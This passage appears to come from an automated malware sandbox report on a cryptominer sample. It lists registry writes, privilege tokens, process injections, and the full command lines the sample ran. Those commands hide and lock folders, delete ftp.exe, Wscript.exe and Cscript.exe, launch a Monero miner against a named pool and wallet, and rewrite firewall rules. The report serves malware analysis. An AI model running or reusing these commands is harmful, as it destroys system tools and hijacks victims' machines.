Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\SysWOW64\netsh.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\SysWOW64\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-101 = "Provides DHCP based enforcement for NAP" C:\Windows\SysWOW64\netsh.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-103 = "1.0" C:\Windows\SysWOW64\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-2 = "Provides IPsec based enforcement for Network Access Protection" C:\Windows\SysWOW64\netsh.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\SysWOW64\netsh.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\SysWOW64\netsh.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\SysWOW64\netsh.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\SysWOW64\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0" C:\Windows\SysWOW64\netsh.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\SysWOW64\netsh.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\SysWOW64\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-103 = "Microsoft Corporation" C:\Windows\SysWOW64\netsh.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\SysWOW64\netsh.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\SysWOW64\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-100 = "DHCP Quarantine Enforcement Client" C:\Windows\SysWOW64\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-101 = "Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies." C:\Windows\SysWOW64\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation" C:\Windows\SysWOW64\netsh.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Fonts\banbecud\Wscntfy.exe N/A
N/A N/A C:\Windows\Fonts\banbecud\Wscntfy.exe N/A
N/A N/A C:\Windows\Fonts\banbecud\Wscntfy.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0N.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeLockMemoryPrivilege N/A C:\ProgramData\Microsoft\Windows\Templates\gahbpcrd\Imjpmig.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Fonts\banbecud\Wscntfy.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Fonts\banbecud\Wscntfy.exe N/A
N/A N/A C:\Windows\Fonts\banbecud\Wscntfy.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2868 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0N.exe C:\Windows\system32\cmd.exe
PID 2868 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0N.exe C:\Windows\system32\cmd.exe
PID 2868 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0N.exe C:\Windows\system32\cmd.exe
PID 1636 wrote to memory of 1920 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 1636 wrote to memory of 1920 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 1636 wrote to memory of 1920 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2868 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0N.exe C:\Windows\system32\cmd.exe
PID 2868 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0N.exe C:\Windows\system32\cmd.exe
PID 2868 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0N.exe C:\Windows\system32\cmd.exe
PID 836 wrote to memory of 1624 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cacls.exe
PID 836 wrote to memory of 1624 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cacls.exe
PID 836 wrote to memory of 1624 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cacls.exe
PID 2868 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0N.exe C:\Windows\system32\cmd.exe
PID 2868 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0N.exe C:\Windows\system32\cmd.exe
PID 2868 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0N.exe C:\Windows\system32\cmd.exe
PID 1240 wrote to memory of 2576 N/A C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe C:\Windows\system32\cmd.exe
PID 1240 wrote to memory of 2576 N/A C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe C:\Windows\system32\cmd.exe
PID 1240 wrote to memory of 2576 N/A C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe C:\Windows\system32\cmd.exe
PID 2576 wrote to memory of 2624 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2576 wrote to memory of 2624 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2576 wrote to memory of 2624 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 1240 wrote to memory of 2724 N/A C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe C:\Windows\system32\cmd.exe
PID 1240 wrote to memory of 2724 N/A C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe C:\Windows\system32\cmd.exe
PID 1240 wrote to memory of 2724 N/A C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe C:\Windows\system32\cmd.exe
PID 2724 wrote to memory of 2748 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2724 wrote to memory of 2748 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2724 wrote to memory of 2748 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 1240 wrote to memory of 2864 N/A C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe C:\Windows\system32\cmd.exe
PID 1240 wrote to memory of 2864 N/A C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe C:\Windows\system32\cmd.exe
PID 1240 wrote to memory of 2864 N/A C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe C:\Windows\system32\cmd.exe
PID 2864 wrote to memory of 2608 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2864 wrote to memory of 2608 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2864 wrote to memory of 2608 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 1240 wrote to memory of 2616 N/A C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe C:\Windows\system32\cmd.exe
PID 1240 wrote to memory of 2616 N/A C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe C:\Windows\system32\cmd.exe
PID 1240 wrote to memory of 2616 N/A C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe C:\Windows\system32\cmd.exe
PID 2616 wrote to memory of 2644 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2616 wrote to memory of 2644 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2616 wrote to memory of 2644 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 1240 wrote to memory of 2516 N/A C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe C:\Windows\system32\cmd.exe
PID 1240 wrote to memory of 2516 N/A C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe C:\Windows\system32\cmd.exe
PID 1240 wrote to memory of 2516 N/A C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe C:\Windows\system32\cmd.exe
PID 2516 wrote to memory of 2716 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2516 wrote to memory of 2716 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2516 wrote to memory of 2716 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 1240 wrote to memory of 2504 N/A C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe C:\Windows\system32\cmd.exe
PID 1240 wrote to memory of 2504 N/A C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe C:\Windows\system32\cmd.exe
PID 1240 wrote to memory of 2504 N/A C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe C:\Windows\system32\cmd.exe
PID 2504 wrote to memory of 2648 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2504 wrote to memory of 2648 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2504 wrote to memory of 2648 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 1240 wrote to memory of 2596 N/A C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe C:\Windows\system32\cmd.exe
PID 1240 wrote to memory of 2596 N/A C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe C:\Windows\system32\cmd.exe
PID 1240 wrote to memory of 2596 N/A C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe C:\Windows\system32\cmd.exe
PID 2596 wrote to memory of 2476 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2596 wrote to memory of 2476 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2596 wrote to memory of 2476 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 1240 wrote to memory of 2500 N/A C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe C:\Windows\system32\cmd.exe
PID 1240 wrote to memory of 2500 N/A C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe C:\Windows\system32\cmd.exe
PID 1240 wrote to memory of 2500 N/A C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe C:\Windows\system32\cmd.exe
PID 2500 wrote to memory of 2604 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2500 wrote to memory of 2604 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2500 wrote to memory of 2604 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 1240 wrote to memory of 2304 N/A C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe C:\Windows\system32\cmd.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0N.exe

"C:\Users\Admin\AppData\Local\Temp\0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0N.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +r +h +s "C:\Program Files\Common Files\Microsoft Shared\jakbpcjd"

C:\Windows\system32\attrib.exe

attrib +r +h +s "C:\Program Files\Common Files\Microsoft Shared\jakbpcjd"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Cacls "C:\Program Files\Common Files\Microsoft Shared\jakbpcjd" /t /e /c /d administrator

C:\Windows\system32\cacls.exe

Cacls "C:\Program Files\Common Files\Microsoft Shared\jakbpcjd" /t /e /c /d administrator

C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe

"C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del C:\Users\Admin\AppData\Local\Temp\0241FE~1.EXE > nul

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c takeown /f c:\windows\system32\ftp.exe

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\ftp.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c takeown /f c:\windows\SysWOW64\ftp.exe

C:\Windows\system32\takeown.exe

takeown /f c:\windows\SysWOW64\ftp.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c takeown /f c:\windows\system32\Wscript.exe

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\Wscript.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c takeown /f c:\windows\SysWOW64\Wscript.exe

C:\Windows\system32\takeown.exe

takeown /f c:\windows\SysWOW64\Wscript.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c takeown /f c:\windows\system32\Cscript.exe

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\Cscript.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c takeown /f c:\windows\SysWOW64\Cscript.exe

C:\Windows\system32\takeown.exe

takeown /f c:\windows\SysWOW64\Cscript.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls c:\windows\SysWOW64\ftp.exe /grant administrators:F

C:\Windows\system32\icacls.exe

icacls c:\windows\SysWOW64\ftp.exe /grant administrators:F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls c:\windows\system32\ftp.exe /grant administrators:F

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\ftp.exe /grant administrators:F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls c:\windows\SysWOW64\Wscript.exe /grant administrators:F

C:\Windows\system32\icacls.exe

icacls c:\windows\SysWOW64\Wscript.exe /grant administrators:F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls c:\windows\system32\Wscript.exe /grant administrators:F

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\Wscript.exe /grant administrators:F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls c:\windows\SysWOW64\Cscript.exe /grant administrators:F

C:\Windows\system32\icacls.exe

icacls c:\windows\SysWOW64\Cscript.exe /grant administrators:F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls c:\windows\system32\Cscript.exe /grant administrators:F

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\Cscript.exe /grant administrators:F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /F /Q c:\windows\system32\ftp.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /F /Q c:\windows\SysWOW64\ftp.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /F /Q c:\windows\system32\Wscript.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /F /Q c:\windows\SysWOW64\Wscript.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /F /Q c:\windows\system32\Cscript.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /F /Q c:\windows\SysWOW64\Cscript.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +r +h +s "C:\ProgramData\Microsoft\Windows\Templates\gahbpcrd"

C:\Windows\system32\attrib.exe

attrib +r +h +s "C:\ProgramData\Microsoft\Windows\Templates\gahbpcrd"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Cacls "C:\ProgramData\Microsoft\Windows\Templates\gahbpcrd" /t /e /c /d administrator

C:\Windows\system32\cacls.exe

Cacls "C:\ProgramData\Microsoft\Windows\Templates\gahbpcrd" /t /e /c /d administrator

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +r +h +s "C:\Program Files\common files\system\wk.ini"

C:\Windows\system32\attrib.exe

attrib +r +h +s "C:\Program Files\common files\system\wk.ini"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Cacls "C:\Program Files\common files\system\wk.ini" /t /e /c /d administrator

C:\Windows\system32\cacls.exe

Cacls "C:\Program Files\common files\system\wk.ini" /t /e /c /d administrator

C:\ProgramData\Microsoft\Windows\Templates\gahbpcrd\Imjpmig.exe

"C:\ProgramData\Microsoft\Windows\Templates\gahbpcrd\Imjpmig.exe" -V -o xmr.crypto-pool.fr:443 -u 46SFbeVmsAAR8cFBJ3jjrqbvDheyLShJSfoiPDnoW2W2cimgZJaXCE7aKxgZ4AsUATe1ap4jHEGJ2E9jrYVf1Xb1CSAQDyU -p x -k -t 6

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +r +h +s "C:\Windows\Fonts\banbecud"

C:\Windows\system32\attrib.exe

attrib +r +h +s "C:\Windows\Fonts\banbecud"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Cacls "C:\Windows\Fonts\banbecud" /t /e /c /d administrator

C:\Windows\system32\cacls.exe

Cacls "C:\Windows\Fonts\banbecud" /t /e /c /d administrator

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +r +h +s "C:\Program Files\common files\system\jk.ini"

C:\Windows\system32\attrib.exe

attrib +r +h +s "C:\Program Files\common files\system\jk.ini"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Cacls "C:\Program Files\common files\system\jk.ini" /t /e /c /d administrator

C:\Windows\system32\cacls.exe

Cacls "C:\Program Files\common files\system\jk.ini" /t /e /c /d administrator

C:\Windows\Fonts\banbecud\Wscntfy.exe

C:\Windows\Fonts\banbecud\Wscntfy.exe

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net start MpsSvc&cmd.exe /c sc config MpsSvc start= auto&cmd.exe /c netsh advfirewall set allprofiles state on&netsh advfirewall set allprofiles firewallpolicy allowinbound,allowoutbound&netsh advfirewall firewall delete rule name=all protocol=tcp localport=137&netsh advfirewall firewall delete rule name=all protocol=tcp localport=138&netsh advfirewall firewall delete rule name=all protocol=tcp localport=139&netsh advfirewall firewall delete rule name=all protocol=tcp localport=445&netsh advfirewall firewall delete rule name=all protocol=udp localport=137&netsh advfirewall firewall delete rule name=all protocol=udp localport=138&netsh advfirewall firewall delete rule name=all protocol=udp localport=139&netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=TCP localport=137&netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=TCP localport=138&netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=TCP localport=139&netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=udp localport=137&netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=udp localport=138&netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=udp localport=139&cmd.exe /c netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=TCP localport=445&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=2999&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=3000&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=3001&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=3002&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=3003&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=3333&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=4444&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=5555&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=6666&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=7777&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=8888&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=9999&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=8443&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=8080&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=14444&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=14433&cmd.exe /c netsh advfirewall firewall add rule name=microsoft dir=out action=allow protocol=TCP remoteport=80&netsh advfirewall firewall add rule name=microsoft dir=out action=allow protocol=UDP remoteport=53&cmd.exe /c netsh advfirewall firewall add rule name=microsoft dir=out action=allow protocol=TCP remoteport=443

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c wmic&exit&exit

C:\Windows\SysWOW64\net.exe

net start MpsSvc

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 start MpsSvc

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c sc config MpsSvc start= auto

C:\Windows\SysWOW64\sc.exe

sc config MpsSvc start= auto

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c netsh advfirewall set allprofiles state on

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall set allprofiles state on

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall set allprofiles firewallpolicy allowinbound,allowoutbound

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall delete rule name=all protocol=tcp localport=137

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall delete rule name=all protocol=tcp localport=138

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall delete rule name=all protocol=tcp localport=139

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall delete rule name=all protocol=tcp localport=445

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall delete rule name=all protocol=udp localport=137

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall delete rule name=all protocol=udp localport=138

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall delete rule name=all protocol=udp localport=139

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=TCP localport=137

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=TCP localport=138

C:\Windows\SysWOW64\netsh.exe

